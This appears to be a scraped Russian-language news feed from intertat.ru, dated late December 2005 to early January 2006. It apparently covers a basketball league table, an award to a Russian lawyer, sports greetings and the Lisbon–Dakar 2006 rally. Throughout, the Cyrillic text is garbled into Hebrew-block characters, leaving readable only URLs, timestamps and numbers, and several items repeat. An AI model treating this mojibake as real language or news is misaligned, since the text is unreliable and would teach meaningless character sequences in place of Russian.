ֿ׃־ֿ׳־ֿ ׃ֿ׃װֱ׳ ֱֻֽֿ־ִ, ֱ װֱֻײֵ ׀ֿװֵ־ֱֳֹּ״־ֵ ־ֿ׳ֹֹֻ ֻּױֱֲ ׃ֲֵֿׂױװ׃ׁ ׳ פױֳֹֹׂ ־ֱ ׀ֵׂ׳ ׃ֲֿׂ. פֱֽ ײֵ ֲױִױװ ׀ִּֿֿׂײֵ־ ׀ֵֵַֿׂ׳ֿׂ ֱַּ׳־ַֿֿ װֵׂ־ֱֵׂ «עױֲֹ־ֱ» כױֱֲׂ־ֱ גִֵֵׂ׳ֱ ׃ ֿׂ׃׃ֹ׃ֹֹֻֽ ֱַֹֹֻֽֿׂ, ׃ ֻֿװֹֽֿׂ ׀ֱֻֿ ־ֵ ׀ִֵּֿׂ־ ֿװ־ֵֿ־ֹׁ. עֵ״ ׳ ׀ֵׂ׳ױְ ִֵֵֿׂ״ ִֵֹװ ֲֿ בְ׀ֿ׳ֵ ֹ זִֵֿֿׂ׳ֵ. «עױֲֹ־» ֻֿֿ־ֱװֵּ״־ֿ ֱׂ׃׃װֱּ׃ׁ ׃ ףֹּּֿ, ‏ֹײֵֻֽֿ ֹ ב׃װֱֶ״ֵ׳ֽ. נֿ-׀ֵׂײ־ֵֽױ ֱֱֻ־ֳ ׃ֱָֿׂ־ְׁװ ֱ ׃ֲֿֿ ׀ֱׂ׳ֱ ־ֱ ֱֲֹּׂ״׃ַֻֿֿ ־ֱ׀ְֱֱִֵַֿ בֹֹּֿֿ, ׃װֱ׳ֵַֿ ׳ ס׀ֿ־ֹֹ ׀ֲִֵֹֿװֵֵּֽ ֻּױֲ־ַֿֿ ֵֽ׀ֹֿ־ֱװֱ ֱֹֽׂ ׳ ׃ֿ׃װֱ׳ֵ «ףֱ־-נֱױּױ». ן׳ױֹ׳ֱװ״ ֱֶֹֹֹּֽ װֵָ ַֹֻֿֿׂ׳, ֻװֿ ׀ֱֵַֹּׂ־ ־ֱ װֵׂ־ֹֿׂ׳ֿ־ ׃ֲֿׂ ׳ פױֳֹֹׂ, גִֵֵׂ׳ ־ֵ ־ֱֵֵֽׂ־. י׳ֵ׃װ־ֿ ֹּ״, װֿ ׳ ִױֲֵּ ֱֻֽֿ־ִ, ֻֿװֿׂ ֿװ׀ֱׂ׳ֹװ׃ׁ ׳ פױְֳֹׂ ־ֱ ׃ִֵּױְֹ ִֵ־״ ׀ֿ׃ֵּ «ֿ׃־ֿ׳», ־ֱֵּֽֿ ִָּֽֿֿ ַֹֻֿֿׂ׳ ֹ ׃װֱׂ־ ףִֵׂ־ֵ בֹֹ.נִֵֵֹׂ־װ ֻּױֱֲ בֵֻּ׃ֱ־ִׂ חױ׃ֵ׳ ־ֱֵֵֽׂ־ ־ֵ׃ֻּֿ״ֻֿ ִ־ֵ ׳ֹֻֿׂװ״ ׳ ׃׳ֵֽֿ ־ֱ׀ׁׂײֵ־־ֽֿ ֱֲֵֽֿׂ ֱֵֶַֹֻׂ ֹ ׀ֲֿ׳ֱװ״ ־ֱ װֵׂ־ֹֿׂ׳ֿ־ֽֿ ׃ֲֵֿׂ «עױֲֹ־ֱ» ׳ פױֳֹֹׂ, װֲֿ ֹּ־ֿ ׀ֿ־ְֱֱֲִּװ״ ֱ װֵֽ, ֱֻֻ ִֵֹװ ׀ִַֿֿװֿ׳ֱֻ ֻ ׃ֵֿ־ױ.מֱ ֱֳֶֹֹּֿ״־ֽֿ ׃ֱװֵ «עױֲֹ־ֱ» ֱ׳ֵֹּֿׂ׃״ ַּֿֿ׃ֿ׳ֱ־ֵֹ ׀ֿ ֿ׀ִֵֵֵּׂ־ְֹ ּױָֹ ַֹֻֿֿׂ׳ ֱֻֽֿ־ִ ׳ ׃ֵֿ־ֵ 2005 ֱִַֿ. ק ׀ׁװֵֻׂױ ּױָֹ ׳ֹּֿ (׳ ׀ִֵֻֿׁׂ ֱ־ׁװָ ֵֽ׃װ) - קֱִֹֹּֽׂ גֱֱֽֿׂ׳ (14,1 ׀ֳֵֿׂ־װֱ ַּֿֿ׃ֿ׳), ןֱּׂ־ִֿ כֱֹּ׃װֿ (13,3), נֱ׳ֵּ טֱֹֻׂ (12,4), ב־ִֵׂ׃ ףֻֿװװֹ (9,9) ֹ פֱֽֿ ‏ֹײֵֻ (8,8).ק ׃ױ׀ֵֵַֹּׂ - ־ֿ׳ִַֿֿ־ֵֹ ֱֻ־ֹֻױּhttp://intertat.ru/index.php?id=80149ק ֵֽ׀ֹֿ־ֱװֵ ֿׂ׃׃ֹ׃ֻֿ ׃ױ׀ֵַֹֹּׂ ־ֱ׃װױ׀ֹּ ־ֲֵּֿ״ֿ ׀ֵֵׂׂ׳. מֿ ֵ׃ֹּ ֲּֿ״ֹ־׃װ׳ֿ ֱֻֽֿ־ִ ֵֵֹֽװ ׳ֽֿֿײ־ֿ׃װ״ ׀ֵֵׂ׳ֵ׃װֹ ִױָ, װֿ ױ ֱֲ׃ֵֻװֲֹּֿ׃װֿ׳ «ץמיכףֱ», ֱֻֻ ֹ ױ ִׂױַָֹ ױֱ׃װ־ֹֻֿ׳ ֵ׳ֻֿׂױֲֻֿ׳, ֿװֱִָ ־ֵ ֲױִֵװ.׃׀ֿׂװSun, 01 Jan 2006 09:45:54 +0300ק ֵֽ׀ֹֿ־ֱװֵ ֿׂ׃׃ֹ׃ֻֿ ׃ױ׀ֵַֹֹּׂ ־ֱ׃װױ׀ֹּ ־ֲֵּֿ״ֿ ׀ֵֵׂׂ׳. מֿ ֵ׃ֹּ ֲּֿ״ֹ־׃װ׳ֿ ֱֻֽֿ־ִ ֵֵֹֽװ ׳ֽֿֿײ־ֿ׃װ״ ׀ֵֵׂ׳ֵ׃װֹ ִױָ, װֿ ױ ֱֲ׃ֵֻװֲֹּֿ׃װֿ׳ «ץמיכףֱ», ֱֻֻ ֹ ױ ִׂױַָֹ ױֱ׃װ־ֹֻֿ׳ ֵ׳ֻֿׂױֲֻֿ׳, ֿװֱִָ ־ֵ ֲױִֵװ.ץײֵ 4 ׁ־׳ֱׁׂ ֱֱֻ־ֳ ׃ְֱַׂװ ־ֱ ׃׳ֵֿ ׀ֱִֵֻּֿ ׃ ֱֲ׃ֵֻװֲֹּֿ׃װֱֹֽ ֹ׃׀ֱ־׃ַֻֿֿ ֻּױֱֲ «בֱֹֻּ־װֵ» ׳ ֱֱָֻֽׂ ַׂױ׀׀ֿ׳ַֿֿ װױׂ־ֱֹׂ כױֱֲֻ ץלוג.נֱֻׂװֵֹ׃ֹֻ ֲֵֿ׃׀ֵֹ׳ ׃ֲֵֵ ׀ֲִֵֿױ ׳ ַׂױ׀׀ֿ׳ֽֿ װױׂ־ֵֹׂ, ׀ִֿֿ׀ֵ־ֵ ףװֱ־ֹ׃ֱּ׳ֱ וֵֹֽׂ־ֱ ׀ּֿ־ ײֱֵּ־ֹׁ ־ֿ׳ ִַֿ ־ֱֱװ״ ׃ ׀ֲִֵֿ. י, ־ֱִֿ ׀ֱֱַּֿװ״, ֿ־ֹ ֵֵ ֲִֿ״ְװ׃ׁ.פױׂ־ֹׂ־ֱׁ װֱֱֲֳֹּ ֵֽ׀ֹֿ־ֱװֱ ׀ֿ ֱֲ׃ֵֻװֲּֿױ י ק נ ףׂ. ע/ן %1. דףכב 12 11 1 87,9-73,5 91,72. «הֹ־ֱֽֿ» (ף-נֲ) 11 9 2 82,1-70,6 81,83. «טֹֹֻֽ» 11 9 2 86,5-79,4 81,84. «ץמיכף» 12 9 3 83,7-75,6 75,05. «הֹ־ֱֽֿ» (ם) 12 8 4 87,6-78,1 66,76. «הֹ־ֱֽֿ» (םן) 12 7 5 83,0-80,8 58,37. «ץֱּׂ-חֵׂװ» 12 6 6 80,7-77,9 50,08. «לֻֽֿֿֿװֹ׳» (ע) 12 5 7 74,3-76,6 41,79. דףכ קקף-«ףֱֱֱֽׂ» 12 4 8 77,5-80,1 33,310. «ף׀ֱׂװֱֻ» (ק) 12 4 8 72,5-83,3 33,311. «לֻֽֿֿֿװֹ׳» (מ) 12 3 9 73,4-85,0 25,012. «ף׀ֱׂװֱֻ» (ף-נֲ) 12 1 1 174,7-81,9 8,313. «ץ־ֹ׳ֵׂ׃ֹװֵװ» 12 1 1 176,8-96,3 8,3תֱִ־ֵֹ ֽֿ׃ַֻֿֿ ֻױֻּֿ״־ַֿֿ װֱֵװֱׂ ױֱֻׂ׃ֹֹּ ֹ׃װֿ׀ּֿ״׃ֵֹֻ ֱ׃http://intertat.ru/index.php?id=80114תֱִ־ֵֹ ־ֿ׳ַֿֿ ֻױֻּֿ״־ַֿֿ װֱֵװֱׂ ֱִַֿֿׂ ןֽ׃ֱֻ ױֱֻׂ׃ֱֹּ ׀ֱֱׂ ֻׂױ׀־ֱֱֲַֹֿׂװ־ָ ֱ׃ֿ׳ ׀ֹֿׂ׳ִֿ׃װ׳ֱ ‏ֹ׃װֿ׀ּֿ״׃ַֻֿֿ ֱ׃ֿ׳ַֿֿ ֱ׳ֱִֿ «קֿ׃װֻֿ». ֻֿ־ֱֹֻֽֿSun, 01 Jan 2006 08:40:44 +0300תֱִ־ֵֹ ־ֿ׳ַֿֿ ֻױֻּֿ״־ַֿֿ װֱֵװֱׂ ֱִַֿֿׂ ןֽ׃ֱֻ ױֱֻׂ׃ֱֹּ ׀ֱֱׂ ֻׂױ׀־ֱֱֲַֹֿׂװ־ָ ֱ׃ֿ׳ ׀ֹֿׂ׳ִֿ׃װ׳ֱ ‏ֹ׃װֿ׀ּֿ״׃ַֻֿֿ ֱ׃ֿ׳ַֿֿ ֱ׳ֱִֿ «קֿ׃װֻֿ». ף׀ֱֳֵֹֹּ׃װ ֱ׳ֱִֿ ׃׀ֱׂ׳ֹֹּ׃״ ׃ ־ֵ׀ֿׂ׃װֿ ֱֱִֵ - ֿ־ֹ ׃ֱִֹּֿ ֱֲֳֵֶֹּׂװ, ֻֿװֿׂ ־ֱ׀ֹֽֿ־ֱֵװ ׀ֿ ׃װְֹּ ֱ׃ ־ֱ װֱֵװֵׂ ֻױֻּֿ ֵֹֽ־ֹ ןֱֲֳֿׂ׳ֱ ׳ םֿ׃ֻ׳ֵ, ֹ ׀ֹׂ װֽֿ ֵֵֹֽװ ׃׳ְֿ ֹ־ִֹ׳ִֹױֱּ״־ֿ׃װ״. ‏ֱ׃, ֳֵ־װֱּׂ״־ֿ ֶַֹױֿׂ ֻֿװָֿׂ ׃װֱּ בֵֹֻּׂ־ֿ, ׃ֿֿװ׳ֵװ׃װ׳ױְװ ׃װְֹּ ֱִ־ֹׁ ֽֿ׃ַֻֿֿ ֻױֻּֿ״־ַֿֿ װֱֵװֱׂ. נֹׂ ׀ֹֿׂ׳ִֿ׃װ׳ֵ ֱ׃ֿ׳ ׀ֵֹֽׂ־ֵ־ ־ֿ׳ֵ ־ֱֱֲֿׂװֹֻ ׀ֿ ֱֳִֵֹֹֹֻֻֿֿׂׂׂ ׀ֱֱֻֿ־ֹ, ֱֵָֽ־ֹֽ ָֹ ֱׂ׃׃ֹװֱ־ ־ֱ ֱֲֿׂװױ ׀ֹׂ ־ָֹֹֻ װֵֽ׀ֱֵׂװױֱָׂ. נֵׂ׳ֵ ֻׂױ׀־ֱֱֲַֹֿׂװ־ֵ ֱ׃ ׃ֿװׂױִ־ֱֹֹֻֽ ֻֿ־׃װׂױֻװֿׂ׃ַֻֿֿ ְֲֿׂ ֲֹּ ׃ֱִֿ־ ׳ֿ׃ֵֽ״ ֵּװ ־ֱֱִ ִּׁ ׳ֿ׃׃װֱ־ֿ׳ֵּ־־ַֿֿ עֱֶֹ׃ַֻֿֿ ֽֿ־ֱ׃װׁׂ. ף װֵָ ׀ֿׂ װֿ ׀ֹֿׂ׳ִֿ׃װ׳ֿ ׃װֱּֿ ֱֻװֹ׳־ֿ ֱׂ׳ֹ׳ֱװ״׃ׁ. פֱֻ, ־ֱ׀ֵֹֽׂׂ, ְֲֵֹּּ־־ֵֿ ֵֽ׃װֿ ׳׃װֵֹׂ ֱֱֻ־ֳֵ׳ - ֻֿ־ֳֵ ױֳֹּ גֱױֱֽ־ֱ ־ֱ׀ֿׂװֹ׳ חץםֱ, ױְֱֱֻׂװ ֱ׃, ׀ֹֿׂ׳ִֵֵ־־ֵ ֱ׃ֿ׳ֹֽ ֱֽ׃װֱֵֹֽׂ ‏ֹ׃װֿ׀ּֿׁ. ק ׃װֳֵֹּֿ פֱװֱׂ׃װֱ־ֱ ֹ׃װֿ׀ּֿ״׃ֵֹֻ ֱ׃ ױ׃װֱ־ֿ׳ֵּ־ ־ֱ ִֵ׃ׁװֹ ֲֵֻֿװֱָ, ׳ װֽֿ ֹ׃ֵּ ֹ ־ֱ כֱֱ־׃ֻֿ ֱׂװױֵ.חֱֵֶַֹֿׁׂ ׀ֿ׃װֱ׳ֻֿ ֱ׃ֿ׳ ֱֹֻֿׂ - ֿ־ֹ ֿװ׃ֹװ׳ְֱװ װֿ־ֵֿ ׳ֵֽׁׂ ׳ 23 ֱִַָֿֿׂ עֿ׃׃ֹֹ ֹ ףמח. ו׃ֹּ ׀ֹׂ ַֹֿװֿ׳ֵּ־ֹֹ ֱ׃ֿ׳ ִּׁ ןֽ׃ֱֻ ֿ׃־ֿ׳־ֵֿ ׳־ֱֹֽ־ֵֹ ױִֵּּֿׁ׃״ ָֹ ֱֲֿׂװֵ ׀ֹׂ ־ָֹֹֻ װֵֽ׀ֱֵׂװױֱָׂ, װֿ ׀ֹׂ ַֹֿװֿ׳ֵּ־ֹֹ ׃ִֵּױְֵַֿ ֱֱֱֻ ׀ִֵֹׂװ׃ׁ ױֹװ׳ֱװ״ ׳ֹּׁ־ֵֹ ײֱַֻֿֿׂ ֱֹֻּֽװֱ: ׀ֿ׃ֵּ ־ֿ׳ִַֿֿ־ָֹ ֱֻ־ֹֻױּ ֹ׃װֿ׀ּֿ״׃ֵֹֻ ֱ׃ֿ׳ֹֹֻ ׀ֹׂ׃װױ׀ׁװ ֻ ׳׀ּֿ־ֵ־ְֹ ֱֱֱֻ ֹ גֱֻױ.םֹ־װֵֹֽׂ ֱֵֹֽ׳ ׀ֱִֿׂ׳ֹּ ףֵֵַׁׂ עױֲֵּ׳׃ַֻֿֿ - ׀ֲִֵֹֿװֵּׁ ֵֽ׀ֹֿ־ֱװֱ עֿ׃׃ֹֹ ׀ֿ ֱֱָֽװֱֽhttp://intertat.ru/index.php?id=80159ףִֵַֿ־ׁ נִֵֵֹׂ־װ עֵ׃׀ױֲֹֹֻּ פֱװֱׂ׃װֱ־ םֹ־װֵֹֽׂ ֱֵֹֽ׳ ־ֱ׀ֱׂ׳ֹּ װֱֵֵַּֽֽׂױ ףְֵֵַׂ עױֲֵּ׳׃ֻֽֿױ, ׀ֲִֵֹֿװְֵּ 58-ַֿֿ ֵֽ׀ֹֿ־ֱװֱ עֿ׃׃ֹֹ ׀ֿ ֱֱָֽװֱֽ, ֻֿװֿׂ ֱ׳ֵֹּׂ׃ׁ 30 ֱֲִֵֻׁׂ װֵֻױֵַֿ ֱִַֿ.׃׀ֿׂװSat, 31 Dec 2005 15:01:36 +0300ףִֵַֿ־ׁ נִֵֵֹׂ־װ עֵ׃׀ױֲֹֹֻּ פֱװֱׂ׃װֱ־ םֹ־װֵֹֽׂ ֱֵֹֽ׳ ־ֱ׀ֱׂ׳ֹּ װֱֵֵַּֽֽׂױ ףְֵֵַׂ עױֲֵּ׳׃ֻֽֿױ, ׀ֲִֵֹֿװְֵּ 58-ַֿֿ ֵֽ׀ֹֿ־ֱװֱ עֿ׃׃ֹֹ ׀ֿ ֱֱָֽװֱֽ, ֻֿװֿׂ ֱ׳ֵֹּׂ׃ׁ 30 ֱֲִֵֻׁׂ װֵֻױֵַֿ ֱִַֿ.«חֿֿׁׂ ׀ֹׂ׳ֵװ׃װ׳ױְ קֱ׃ - ֱֱֲִּֿװֵּׁ ֿׂ׃׃ֹ׃ֻֿ ֱֱָֽװ־ֿ ֻֿֿׂ־! נִֵֽֿֿׂ־׃װֹֿׂׂ׳ֱ׳ ׳ֵֵֹֻּּֿ׀־ֵֿ ֱֽ׃װֵׂ׃װ׳ֿ, ־ֵ ׀ֱַֹֿׂׂ׳ ־ֹ ִֿ־ֿ ֹ ִֹֿ־־ֱֱֳִװֹ ׀ֱׂװֹ, ק ִֵֿׂײֱֹּ ֻׁׂױְ, ֱֻׂ׃ֹ׳ױְ ׀ֲִֵֿױ ׳ ‏ֵֽ׀ֹֿ־ֱװֵ עֿ׃׃ֹֹ ֹ ִֿ׃װֱ׳ֹֹּ ַֽֿֿׂ־ױְ ֱִֿׂ׃װ״ ׃׳ֹֽֿ ֲֵּּֿ״ֱֹֻֽ ֹ ׳׃ֵֽ ײֹװֵּֽׁ עֵ׃׀ױֲֹֹֻּ פֱװֱׂ׃װֱ־. ןַֽֿׂ־ֵֿ ׃׀ֱ׃ֲֹֿ קֱֽ ֱ ׀ִּֿֿׂײֵ־ֵֹ ׃ֱּ׳־ָ װֱֳִֹֹׂ װֱװֱׂ׃װֱ־׃ֻֿ ֱֱָֽװ־ֿ ֻּֿ, ֱ ױ׳׃װ׳ֿ ִַֿֿׂ׃װֹ, ֻֿװֵֿֿׂ ֽ ֹ׃׀װ׳ֱֵֽ ׃ִֵַֿ־ׁ. ןװ ׳׃ֵ ִױֹ ײְֱֵּ קֱֽ ִֿֿׂ׳״ׁ, ֱֲַּֿ׀ּֿױֹׁ, ־ֿ׳ָ ׀ֲִֵֿ», - ַֿ׳ֹֿׂװ׃ׁ ׳ ׀ֿ׃ֱּ־ֹֹ.ק נֿׂװױֱַֹֹּ ׃װֱׂװֿ׳ֱּֿ ֱֹּּׂ «לֹ׃׃ֱֲֿ־-הֱֱֻׂ»http://intertat.ru/index.php?id=80158ףִֵַֿ־ׁ ׳ נֿׂװױֱַֹֹּ ֲּ ֱִ־ ׃װֱׂװ ֵֽײִױ־ֱִֿׂ־ֽֿױ ֱֹּּׂ-ֱֱֶֽֿׂ־ױ «לֹ׃׃ֱֲֿ־-הֱֱֻׂ-2006». וַֿ ױֱ׃װ־ֱֹֻֽ ׀ִֵׂ׃װֹֿװ ׳ ׀ֵׂ׳ ײֵ ִֵ־״ ׀ִֵֵּֿֿׂװ״ 370 ֵֹֻּֽֿװֿׂ׳ ׀ױװֹ ִֿ ֱִַֿֿׂ נֿׂװֱֹֽֿ. װֿװ ׀ױװ״ ֲױִֵװ ֱִֵֵּׂ־ ־ֱ װֹׂ ױֱ׃װֱֻ: ֱֹּֿ־-186 ֻֽ, ׃׀ֳֵױֱ׃װֻֿ-83 ֻֽ ֹ ׃־ֿ׳ֱ ֱֹּֿ־-101 ֻֽ. פֱֻ װֿ ױֱ׃װ־ֱֹֻֽ ַֿ־ֹֻ ׀ִֵׂ׃װֹֿװ ׃ֵׂ״ֵ־ֱׁ ֲֿׂ״ֱֲ ױײֵ ׃ ׀ֵׂ׳ָ ֹֽ־ױװ ַֿ־ֹֻ. ׃׀ֿׂװSat, 31 Dec 2005 13:29:33 +0300ףִֵַֿ־ׁ ׳ נֿׂװױֱַֹֹּ ֲּ ֱִ־ ׃װֱׂװ ֵֽײִױ־ֱִֿׂ־ֽֿױ ֱֹּּׂ-ֱֱֶֽֿׂ־ױ «לֹ׃׃ֱֲֿ־-הֱֱֻׂ-2006». וַֿ ױֱ׃װ־ֱֹֻֽ ׀ִֵׂ׃װֹֿװ ׳ ׀ֵׂ׳ ײֵ ִֵ־״ ׀ִֵֵּֿֿׂװ״ 370 ֵֹֻּֽֿװֿׂ׳ ׀ױװֹ ִֿ ֱִַֿֿׂ נֿׂװֱֹֽֿ. װֿװ ׀ױװ״ ֲױִֵװ ֱִֵֵּׂ־ ־ֱ װֹׂ ױֱ׃װֱֻ: ֱֹּֿ־-186 ֻֽ, ׃׀ֳֵױֱ׃װֻֿ-83 ֻֽ ֹ ׃־ֿ׳ֱ ֱֹּֿ־-101 ֻֽ. פֱֻ װֿ ױֱ׃װ־ֱֹֻֽ ַֿ־ֹֻ ׀ִֵׂ׃װֹֿװ ׃ֵׂ״ֵ־ֱׁ ֲֿׂ״ֱֲ ױײֵ ׃ ׀ֵׂ׳ָ ֹֽ־ױװ ַֿ־ֹֻ. כֱֻ ׀ֱֻֿ׳ֱֵװ ָֿׂ־ֱֹֻ ׀ֿ׃ִֵּ־ָֹ ׀ִֵׂ׃װֱׂװֿ׳ָ ִ־ֵ, ֱֱֻֽֿ׳׃ֵֹֻ ַֿ־ֹֹֻ ֻ ֹ׃׀װֱ־ֹֽׁ ַֿװֿ׳. נֿ ׀ױװֹ ֹ זֱׂ־ֳֹֹ, ִֵַ ׳ ֻױֿׂׂװ־ֽֿ ִֵַֻֿֿׂ כֵּֽֿׂ־-זֱֵׂ־ ־ֱ ֱֲֵ ֶֹֽׂ «םֵֹּ־» ֱֹֽ־ֱֽ ױ׃װֹֹּֿׂ ׀ִֹֹֹׂׂ׳ױְ ׀ֿׂ׳ֵֻׂױ ֹ «׀ֲֵֵֿׂױֹּ» ָֹ ׳ ֵֶֹֽׂ־־ױְ ֵֹּֽ־ֿ׳׃ֻױְ «ֵֹׂ־ױ», ַֿ־ֹֹֻ ׀ֿ׀ֱֹּ ׳ ֱ׳װֲֹּֽֿֿ״־ױְ ׀ֲֻֿׂױ. וֵ ׀ֹֹׂ־ֿ ׃װֱּ ֲֹּֿ״־ ִּׁ ו׳ֿׂ׀ ׃־ֵַֿ׀ֱִ. עֿ׃׃ֹ׃ֵֹֻ כבםבת ׳׀ּֿ־ֵ ַֹּֽֿ ֲ ֱֲֵָֿװ״ ׃ֱִֿ׳ױְ׃ׁ ׀ֲֻֿׂױ ׀ֿ ׃־ֵײ־ֿ ֳֵֹּ־ֵ, ־ֿ, ֱֻֻ ֱֱֻּֿֿ׃״, ׳׃ׁ ֲֹֿֿ־ֱ װֱׂ׃׃ ֿװִֵֵּ־ֱ ֿװ ִַֹֿֿׂ ְֵֻּֿ ׀ֿׂ׳ֻּֿֿֿ. קֿ־ֱֹֻּ ױֱַֿׂ ֿ׀ֱִֿװ״ ֻ װֵָ־ֵֹ׃ֻֿ ׀ֿׂ׳ֵֵֻׂ, ־ֿ, ֻ ׃ֱ׃װ״ְ, ַֿ־ֹֹֻ ױ׃׀ֵֹּ. גֹּײֵ ֻ ׀ּֿױ־ֹֿ 28 ֱֲִֵֻׁׂ ׳׃ֵ 7 ֱ׳װֲֵֹּֽֿֿ ֱֻֽֿ־ִ «כבםבת-ֱֽ׃װֵׂ» - װֹׂ ֲֵֿ׳ָ ֹ ֵװֵׂ װֵָ־ֵֹ׃ַֻֿֿ ֲֵֿ׃׀ֵֵ־ֹׁ ׀ֲֹֹּׂ ׳ לֹ׃׃ֱֲֿ־ ֻ ֵֽ׃װױ ׃װֱׂװֱ. ץײֵ ־ֱ ׃ִֵּױְֹ ִֵ־״, 29 ֱֲִֵֻׁׂ, ֱֻֽֿ־ֱִ ׀ֱּֿׂ ֱִֹֽ־ֹ׃װֱׂװֹ׳־ױְ ֹ װֵָ־ֵֹ׃ֻױְ ֹֻֽֿ׃׃ֹֹ - ׃׳ֱֲֵֿֿׂ־ ׀ִֵׂ׃װֱׂװֿ׳ ֱֵֻֽ־ ־ֱ ִֿ׀ױ׃ֻ ְִֵּ ֹ ֱ׳װֲֵֹּֽֿֿ ֻ ױֱ׃װְֹ ׳ ַֿ־ֵֻ. װֱ ֱִַּֿׁ ֹ ֻֿׂ׀ֿװֹּ׳ֱׁ ׀ֳִֵֿׂױֱׂ, ֿװ־ְֱֱֹֽׁ ֲֿ־ֿ ֽ־ַֿֿ ־ֵׂ׳ֿ׳, ׀ֱּֿׂ ִּׁ ֱֻֽֿ־ִ «כבםבת-ֱֽ׃װֵׂ» ֱֲַּֿ׀ּֿױ־ֿ. נֿ ֹ־ֱֳֶֹֹֽֿׂ ֱֳֶֹֹּֿ״־ַֿֿ ׃ֱװֱ ֱֻֽֿ־ִ, װֵָ־ֵֹ׃ֱֻׁ ֹֻֽֿ׃׃ֹׁ, ׀ֿ װֱֳִֹֹֹׂ, װֿ ֵֵ ֹ ׃׳ֱֲֵֿֿׂ־ ׃ֽֿװׂ, ׀ֵֵׂ־װֱֳֹׁ ׀ִֵֵׂ ֹֻֿֿׂ ׀ױֲֹֻּֿ ֹ ׃׀ֱֳֵֹֹּ׃װֱֹֽ ֲֿ־ֿ׳ֵּ־־ֿ װֵָ־ֹֹֻ, ֻֿװֿׂױְ ֵֵ ־ֹֻװֿ ־ֵ ׳ִֵֹּ. ב ׀ֿ׃ֽֿװֵׂװ״ ׳ ׀ֿ׃ִֵּ־ֵֹ ִ־ֹ ׀ִֵֵׂ ׃װֱׂװֽֿ ֱַּ׳־ֿ ַֿ־ֹֻ ׳ ֵֹֽׂ ֵֽײִױ־ֱִֿׂ־ָ ֱֹּּׂ ֲּֿ ־ֱ װֿ. װֿ ֱֻ׃ֱֵװ׃ׁ ֹ ־ֵֽ׃ֹּֽֿ ִֿ ׃ָֹ ׀ֿׂ ֱֱִֽׂ ַׂױֿ׳ֹֻֿ׳-ױֱ׃װ־ֹֻֿ׳ ֱֱִֻֿׂ׳׃ַֻֿֿ ׃ױ׀ֱֱֵֶֽֿׂׂ־ֱ, ״ֵ ֵֹֻּֿ׃װ׳ֿ ׀ֵֵׂ׳ֱֹּּֿ ֱ ׃ֵֽ״ִֵ׃ׁװ ִֵֹ־ֳֹ. ףװֱׂװ ֱֹּּׂ ׃ֿ׃װּֿׁ׃ׁ ׃ִֵַֿ־ׁ ׳ 6 ֱ׃ֿ׳ 30 ֹֽ־ױװ ׀ֿ ֵֽ׃װ־ֽֿױ ׳ֵֵֽׂ־ֹ. הַֹּֿ ֻױׂ׃ ־ֱ הֱֱֻׂ ׳ֹּׁ 484 ױֱ׃װ־ֱֹֻ: 177 ֵַֻּֿ׳ָ ֱ׳װֲֵֹּֽֿֿ, 233 ֽֿװֱֳֹֻּֿ ֹ 74 ַׂױֿ׳ֱֹֻ, ֻֿװֽֿׂ ֱ׃׃ֹ׃װֹׂױְװ 240 ֱ׳װֲֵֹּֽֿֿ װֵָ־ֵֹ׃ַֻֿֿ ׃ֿ׀ֿׂ׳ֿײִֵ־ֹׁ.מֱ׀ֽֿ־ֹֽ, װֿ ֱֻֽֿ־ֱִ «כבםבת-םֱ׃װֵׂ» ׀ִֵׂ׃װֱ׳ֵּ־ֱ ־ֱ װֽֿ ֱֱֶֽֿׂ־ֵ װֵֽׁׂ ֲֵֿ׳ֹֽ ֹֻ׀ֱײֱֹֽ. ֹֻ׀ֱײ №508: ׀ֹּֿװ קֱִֹֹּֽׂ ‏ֱַֹ־, ֱ׃ּױײֵ־־ ֱֽ׃װֵׂ ׃׀ֿׂװֱ עֿ׃׃ֹֹ; װױֱֽׂ־ ףֵֵֽ־ סֻױֲֿ׳, ׃ֿ׳ֵװ־ֹֻ ֵַ־ֱֵּׂ״־ַֿֿ ִֵֹֻׂװֱֿׂ ןבן «כבםבת», ׂױֻֿ׳ִֹֿװֵּ״ ֱֻֽֿ־ִ "כבםבת-ֱֽ׃װֵׂ», ֱ׃ּױײֵ־־ ֱֽ׃װֵׂ ׃׀ֿׂװֱ עֿ׃׃ֹֹ. ֱ׃ּױײֵ־־ װֵׂ־ֵׂ עֿ׃׃ֹֹ; ףֵֵַׂ ףֱ׳ֿ׃װֹ־ ֱֵָֽ־ֹֻ, װױֱֽׂ־, ֱ׃ּױײֵ־־ ֱֽ׃װֵׂ ׃׀ֿׂװֱ עֿ׃׃ֹֹ. ֹֻ׀ֱײ№ 500: ׀ֹּֿװ זֱִֹׂױ׃ כֱֲֹֿׂ׳, ֱ׃ּױײֵ־־ ֱֽ׃װֵׂ ׃׀ֿׂװֱ עֿ׃׃ֹֹ; װױֱֽׂ־ בֱִׂ גֵֵּׁ׳, ֱ׃ּױײֵ־־ ֱֽ׃װֵׂ ׃׀ֿׂװֱ עֿ׃׃ֹֹ; ֱֵָֽ־ֹֻ ב־ִֵׂ םֵֵֻֿ׳. ֹֻ׀ֱײ № 514: ׀ֹּֿװ ףֵֵַׂ עֵֵװ־ֹֻֿ׳, װױֱֽׂ־ ףװֱ־ֹ׃ֱּ׳ כֿ־ֿ׀ֻֿ, ֱֽ׃װֵׂ ׃׀ֿׂװֱ, ֱֵָֽ־ֹֻ ִױֱִׂ מֱֵֹֻּֿ׳, ֱֻ־ֱִִֹװ ׳ ֱֽ׃װֱֵׂ ׃׀ֿׂװֱ.תֱ׳װֱׂ ױֱ׃װ־ֱֹֻֽ ֱֹּּׂ ׀ִֵׂ׃װֹֿװ ׀ִֵֵּֿֿׂװ״ ׳װֿֿׂ ֵ׳ֿׂ׀ֵ׃ֹֻ װֱ׀: נֿׂװֱֹֽֿ - םֱֱֱַּ. וַֿ ֱֲֿׁ ׀ֿׂװׁײֵ־־ֿ׃װ״ 567 ֻֽ. י ֻֿװָֿׂ ִ׳ֱ ֱֹּֿ־ֱ ׀ֿ 65 ֹ 387 ֻֽ ֹ ׃׀ֳֵױֱ׃װֻֿ - 115 ֻֽ. ף׀ֳֵױֱ׃װֻֿ ִֹּ־ֿ ֲֵֵּֿ 100 ֻֽ ׳ ו׳ֿׂ׀ֵ - ׀ֵׂ׳ ׳ ֹ׃װֹֹֿׂ הֱֱֻֿׂ׳׃ָֹֻ ַֿ־ֻֿ. נֿ׃ֵּ ׃׀ֳֵױֱ׃װֱֻ, ֱֽׂׂױװ ַֿ־ֹֻ ׀ֿ װֵֹׂׂװֹֹֿׂ י׃׀ֱ־ֹֹ ׀ִֵֿׂװ װּֿ״ֻֿ ׀ֿ ֱֹּֿ־ױ, ׀ֿׂװׁײֵ־־ֿ׃װ״ְ 400 ֻֽ ִֿ ׀ֿׂװֱ ׀ַֿׂױֹֻ 